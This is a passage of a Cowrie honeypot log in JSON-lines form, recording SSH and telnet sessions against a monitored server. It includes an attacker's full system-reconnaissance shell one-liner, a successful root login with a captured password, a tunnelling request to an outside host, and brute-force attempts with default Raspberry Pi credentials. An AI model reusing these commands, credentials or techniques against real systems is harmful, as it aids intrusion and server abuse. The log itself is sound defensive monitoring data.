2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:35:23.369022Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:35:23.369559Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:35:23.370508Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:35:23.371552Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:35:23.372470Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:35:23.373219Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:35:23.374392Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:35:23.374964Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:35:23.375521Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:35:23.376120Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:35:23.376833Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:35:23.377358Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:35:23.652994Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:35:23.653863Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:35:23.654998Z","src_ip":"212.227.235.229","session":"09114b37e637"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33990,"dst_ip":"1.2.3.4","dst_port":23,"session":"948cd84df334","protocol":"telnet","message":"New connection: 212.227.235.229:33990 (1.2.3.4:23) [session: 948cd84df334]","sensor":"my-vps","timestamp":"2025-09-08T19:36:03.674620Z"}
{"eventid":"cowrie.session.closed","duration":1.8033268451690674,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:36:05.477881Z","src_ip":"212.227.235.229","session":"948cd84df334"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57165,"dst_ip":"1.2.3.4","dst_port":22,"session":"da76e5c0c62e","protocol":"ssh","message":"New connection: 212.227.235.229:57165 (1.2.3.4:22) [session: da76e5c0c62e]","sensor":"my-vps","timestamp":"2025-09-08T19:36:57.136551Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:36:57.137645Z","src_ip":"212.227.235.229","session":"da76e5c0c62e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57527,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6045a8a5e86","protocol":"ssh","message":"New connection: 212.227.235.229:57527 (1.2.3.4:22) [session: c6045a8a5e86]","sensor":"my-vps","timestamp":"2025-09-08T19:36:57.251124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:36:57.251997Z","src_ip":"212.227.235.229","session":"c6045a8a5e86"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T19:36:57.389883Z","src_ip":"212.227.235.229","session":"c6045a8a5e86"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:36:57.805871Z","src_ip":"212.227.235.229","session":"c6045a8a5e86"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T19:36:57.944427Z","session":"c6045a8a5e86"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52240,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4534672c051","protocol":"ssh","message":"New connection: 217.72.205.35:52240 (1.2.3.4:22) [session: b4534672c051]","sensor":"my-vps","timestamp":"2025-09-08T19:37:12.316465Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:37:12.317624Z","src_ip":"217.72.205.35","session":"b4534672c051"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:38:07.252496Z","src_ip":"212.227.235.229","session":"c6045a8a5e86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60428,"dst_ip":"1.2.3.4","dst_port":23,"session":"d651d19e78b0","protocol":"telnet","message":"New connection: 212.227.235.229:60428 (1.2.3.4:23) [session: d651d19e78b0]","sensor":"my-vps","timestamp":"2025-09-08T19:40:28.091536Z"}
{"eventid":"cowrie.session.closed","duration":12.523010015487671,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:40:40.614472Z","src_ip":"212.227.235.229","session":"d651d19e78b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60751,"dst_ip":"1.2.3.4","dst_port":23,"session":"a3b103fabf21","protocol":"telnet","message":"New connection: 212.227.235.229:60751 (1.2.3.4:23) [session: a3b103fabf21]","sensor":"my-vps","timestamp":"2025-09-08T19:40:40.854645Z"}
{"eventid":"cowrie.session.closed","duration":12.729060411453247,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:40:53.583638Z","src_ip":"212.227.235.229","session":"a3b103fabf21"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32841,"dst_ip":"1.2.3.4","dst_port":23,"session":"8bb303e42df8","protocol":"telnet","message":"New connection: 212.227.235.229:32841 (1.2.3.4:23) [session: 8bb303e42df8]","sensor":"my-vps","timestamp":"2025-09-08T19:40:53.863142Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52582,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2f5432d17db","protocol":"ssh","message":"New connection: 212.227.125.160:52582 (1.2.3.4:22) [session: c2f5432d17db]","sensor":"my-vps","timestamp":"2025-09-08T19:41:04.097704Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52584,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae816ac2c66b","protocol":"ssh","message":"New connection: 212.227.125.160:52584 (1.2.3.4:22) [session: ae816ac2c66b]","sensor":"my-vps","timestamp":"2025-09-08T19:41:04.117294Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_7.9p1 Raspbian-10+deb10u1","message":"Remote SSH version: SSH-2.0-OpenSSH_7.9p1 Raspbian-10+deb10u1","sensor":"my-vps","timestamp":"2025-09-08T19:41:04.165715Z","src_ip":"212.227.125.160","session":"c2f5432d17db"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_7.9p1 Raspbian-10+deb10u1","message":"Remote SSH version: SSH-2.0-OpenSSH_7.9p1 Raspbian-10+deb10u1","sensor":"my-vps","timestamp":"2025-09-08T19:41:04.180807Z","src_ip":"212.227.125.160","session":"ae816ac2c66b"}
{"eventid":"cowrie.client.kex","hassh":"ec7378c1a92f5a8dde7e8b7a1ddf33d1","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: ec7378c1a92f5a8dde7e8b7a1ddf33d1","sensor":"my-vps","timestamp":"2025-09-08T19:41:04.231544Z","src_ip":"212.227.125.160","session":"c2f5432d17db"}
{"eventid":"cowrie.client.kex","hassh":"ec7378c1a92f5a8dde7e8b7a1ddf33d1","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none,zlib@openssh.com,zlib","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: ec7378c1a92f5a8dde7e8b7a1ddf33d1","sensor":"my-vps","timestamp":"2025-09-08T19:41:04.242547Z","src_ip":"212.227.125.160","session":"ae816ac2c66b"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-09-08T19:41:04.668452Z","src_ip":"212.227.125.160","session":"ae816ac2c66b"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberryraspberry993311","message":"login attempt [pi/raspberryraspberry993311] failed","sensor":"my-vps","timestamp":"2025-09-08T19:41:04.682745Z","src_ip":"212.227.125.160","session":"c2f5432d17db"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:41:05.734269Z","src_ip":"212.227.125.160","session":"ae816ac2c66b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:41:05.752568Z","src_ip":"212.227.125.160","session":"c2f5432d17db"}
{"eventid":"cowrie.session.closed","duration":12.766912460327148,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:41:06.629982Z","src_ip":"212.227.235.229","session":"8bb303e42df8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33178,"dst_ip":"1.2.3.4","dst_port":23,"session":"23ad7d6f1ea6","protocol":"telnet","message":"New connection: 212.227.235.229:33178 (1.2.3.4:23) [session: 23ad7d6f1ea6]","sensor":"my-vps","timestamp":"2025-09-08T19:41:06.895462Z"}
{"eventid":"cowrie.session.closed","duration":12.724709272384644,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:41:19.620103Z","src_ip":"212.227.235.229","session":"23ad7d6f1ea6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33510,"dst_ip":"1.2.3.4","dst_port":23,"session":"de1d167384cc","protocol":"telnet","message":"New connection: 212.227.235.229:33510 (1.2.3.4:23) [session: de1d167384cc]","sensor":"my-vps","timestamp":"2025-09-08T19:41:19.892242Z"}
{"eventid":"cowrie.session.closed","duration":12.734135150909424,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:41:32.626310Z","src_ip":"212.227.235.229","session":"de1d167384cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33852,"dst_ip":"1.2.3.4","dst_port":23,"session":"777f81b245b5","protocol":"telnet","message":"New connection: 212.227.235.229:33852 (1.2.3.4:23) [session: 777f81b245b5]","sensor":"my-vps","timestamp":"2025-09-08T19:41:32.872992Z"}
{"eventid":"cowrie.session.closed","duration":12.718062400817871,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:41:45.590963Z","src_ip":"212.227.235.229","session":"777f81b245b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34174,"dst_ip":"1.2.3.4","dst_port":23,"session":"6d1a701b8041","protocol":"telnet","message":"New connection: 212.227.235.229:34174 (1.2.3.4:23) [session: 6d1a701b8041]","sensor":"my-vps","timestamp":"2025-09-08T19:41:45.980805Z"}
{"eventid":"cowrie.session.closed","duration":12.694302797317505,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:41:58.675040Z","src_ip":"212.227.235.229","session":"6d1a701b8041"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34521,"dst_ip":"1.2.3.4","dst_port":23,"session":"8c954ad9e6d7","protocol":"telnet","message":"New connection: 212.227.235.229:34521 (1.2.3.4:23) [session: 8c954ad9e6d7]","sensor":"my-vps","timestamp":"2025-09-08T19:41:58.861468Z"}
{"eventid":"cowrie.session.closed","duration":12.752521991729736,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:42:11.613920Z","src_ip":"212.227.235.229","session":"8c954ad9e6d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34871,"dst_ip":"1.2.3.4","dst_port":23,"session":"4880c530f661","protocol":"telnet","message":"New connection: 212.227.235.229:34871 (1.2.3.4:23) [session: 4880c530f661]","sensor":"my-vps","timestamp":"2025-09-08T19:42:11.855428Z"}
{"eventid":"cowrie.session.closed","duration":12.73214840888977,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:42:24.587501Z","src_ip":"212.227.235.229","session":"4880c530f661"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35180,"dst_ip":"1.2.3.4","dst_port":23,"session":"8a608a6dd88b","protocol":"telnet","message":"New connection: 212.227.235.229:35180 (1.2.3.4:23) [session: 8a608a6dd88b]","sensor":"my-vps","timestamp":"2025-09-08T19:42:24.817900Z"}
{"eventid":"cowrie.session.closed","duration":12.824209213256836,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:42:37.642043Z","src_ip":"212.227.235.229","session":"8a608a6dd88b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35522,"dst_ip":"1.2.3.4","dst_port":23,"session":"31a5435a2f45","protocol":"telnet","message":"New connection: 212.227.235.229:35522 (1.2.3.4:23) [session: 31a5435a2f45]","sensor":"my-vps","timestamp":"2025-09-08T19:42:37.882435Z"}
{"eventid":"cowrie.session.closed","duration":12.727658987045288,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:42:50.609993Z","src_ip":"212.227.235.229","session":"31a5435a2f45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35857,"dst_ip":"1.2.3.4","dst_port":23,"session":"aecca0a784a2","protocol":"telnet","message":"New connection: 212.227.235.229:35857 (1.2.3.4:23) [session: aecca0a784a2]","sensor":"my-vps","timestamp":"2025-09-08T19:42:50.859113Z"}
{"eventid":"cowrie.session.closed","duration":12.771244764328003,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:43:03.630291Z","src_ip":"212.227.235.229","session":"aecca0a784a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36178,"dst_ip":"1.2.3.4","dst_port":23,"session":"5fb7ba83efef","protocol":"telnet","message":"New connection: 212.227.235.229:36178 (1.2.3.4:23) [session: 5fb7ba83efef]","sensor":"my-vps","timestamp":"2025-09-08T19:43:03.885777Z"}
{"eventid":"cowrie.session.closed","duration":12.723762035369873,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:43:16.609471Z","src_ip":"212.227.235.229","session":"5fb7ba83efef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36509,"dst_ip":"1.2.3.4","dst_port":23,"session":"b43258a05957","protocol":"telnet","message":"New connection: 212.227.235.229:36509 (1.2.3.4:23) [session: b43258a05957]","sensor":"my-vps","timestamp":"2025-09-08T19:43:16.842985Z"}
{"eventid":"cowrie.session.closed","duration":12.756027221679688,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:43:29.598940Z","src_ip":"212.227.235.229","session":"b43258a05957"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36862,"dst_ip":"1.2.3.4","dst_port":23,"session":"9109fe2f7246","protocol":"telnet","message":"New connection: 212.227.235.229:36862 (1.2.3.4:23) [session: 9109fe2f7246]","sensor":"my-vps","timestamp":"2025-09-08T19:43:29.887982Z"}
{"eventid":"cowrie.session.closed","duration":12.742126941680908,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:43:42.630033Z","src_ip":"212.227.235.229","session":"9109fe2f7246"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37186,"dst_ip":"1.2.3.4","dst_port":23,"session":"13eb3b8a3835","protocol":"telnet","message":"New connection: 212.227.235.229:37186 (1.2.3.4:23) [session: 13eb3b8a3835]","sensor":"my-vps","timestamp":"2025-09-08T19:43:42.870992Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50190,"dst_ip":"1.2.3.4","dst_port":22,"session":"3542daa34e6a","protocol":"ssh","message":"New connection: 217.72.205.35:50190 (1.2.3.4:22) [session: 3542daa34e6a]","sensor":"my-vps","timestamp":"2025-09-08T19:43:46.806567Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:43:46.807713Z","src_ip":"217.72.205.35","session":"3542daa34e6a"}
{"eventid":"cowrie.session.closed","duration":12.806877851486206,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:43:55.677801Z","src_ip":"212.227.235.229","session":"13eb3b8a3835"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37533,"dst_ip":"1.2.3.4","dst_port":23,"session":"1a0851c0967b","protocol":"telnet","message":"New connection: 212.227.235.229:37533 (1.2.3.4:23) [session: 1a0851c0967b]","sensor":"my-vps","timestamp":"2025-09-08T19:43:56.022377Z"}
{"eventid":"cowrie.session.closed","duration":12.655259609222412,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:44:08.677548Z","src_ip":"212.227.235.229","session":"1a0851c0967b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37871,"dst_ip":"1.2.3.4","dst_port":23,"session":"6f37d23e0cec","protocol":"telnet","message":"New connection: 212.227.235.229:37871 (1.2.3.4:23) [session: 6f37d23e0cec]","sensor":"my-vps","timestamp":"2025-09-08T19:44:08.864198Z"}
{"eventid":"cowrie.session.connect","src_ip":"49.156.148.114","src_port":35379,"dst_ip":"1.2.3.4","dst_port":23,"session":"ae8fc0f2c945","protocol":"telnet","message":"New connection: 49.156.148.114:35379 (1.2.3.4:23) [session: ae8fc0f2c945]","sensor":"my-vps","timestamp":"2025-09-08T19:44:14.774521Z"}
{"eventid":"cowrie.session.closed","duration":12.760344505310059,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:44:21.624443Z","src_ip":"212.227.235.229","session":"6f37d23e0cec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38199,"dst_ip":"1.2.3.4","dst_port":23,"session":"64d1f10d38d2","protocol":"telnet","message":"New connection: 212.227.235.229:38199 (1.2.3.4:23) [session: 64d1f10d38d2]","sensor":"my-vps","timestamp":"2025-09-08T19:44:21.897657Z"}
